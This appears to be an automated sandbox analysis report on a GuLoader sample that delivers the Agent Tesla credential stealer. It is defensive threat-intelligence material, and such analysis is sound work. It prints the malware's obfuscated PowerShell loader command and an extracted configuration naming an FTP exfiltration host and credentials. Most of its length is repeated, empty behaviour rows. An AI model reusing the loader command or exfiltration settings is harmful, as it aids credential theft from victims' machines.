Windows
Analysis Report
Ze1Ueabtx5.img
Overview
General Information
Sample name: | Ze1Ueabtx5.imgrenamed because original name is a hash value |
Original sample name: | 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096.unknown |
Analysis ID: | 1518114 |
MD5: | de10bad1ae168cd0c81afb61723464ac |
SHA1: | a5e93224048e0681278eab54ff273068bbb56289 |
SHA256: | 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096 |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 7460 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l.exe -ex bypass -co mmand Moun t-DiskImag e -ImagePa th (gc C:\ Windows\pa th.txt) > tmp.log 2> &1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7544 cmdline:
powershell .exe -ex b ypass -com mand Mount -DiskImage -ImagePat h (gc C:\W indows\pat h.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- Documenti di spedizione 0009333000459595995.exe (PID: 7784 cmdline:
"E:\Docume nti di spe dizione 00 0933300045 9595995.ex e" MD5: 6C446FD0A3F6D498F5CBD0725CE7F232) - powershell.exe (PID: 7816 cmdline:
"powershel l.exe" -wi ndowstyle minimized "$Nasosubn asal=Get-C ontent 'C: \Users\use r\AppData\ Local\acne form\Dysse n.Mod';$Ov erwealthy= $Nasosubna sal.SubStr ing(70317, 3);.$Overw ealthy($Na sosubnasal )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wabmig.exe (PID: 2124 cmdline:
"C:\Progra m Files (x 86)\window s mail\wab mig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-09-25T12:35:49.297316+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 185.29.11.53 | 80 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Dropped File: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: | ||
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static file information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: |
Source: | Anti Malware Scan Interface: | ||
Source: | Anti Malware Scan Interface: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | API/Special instruction interceptor: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
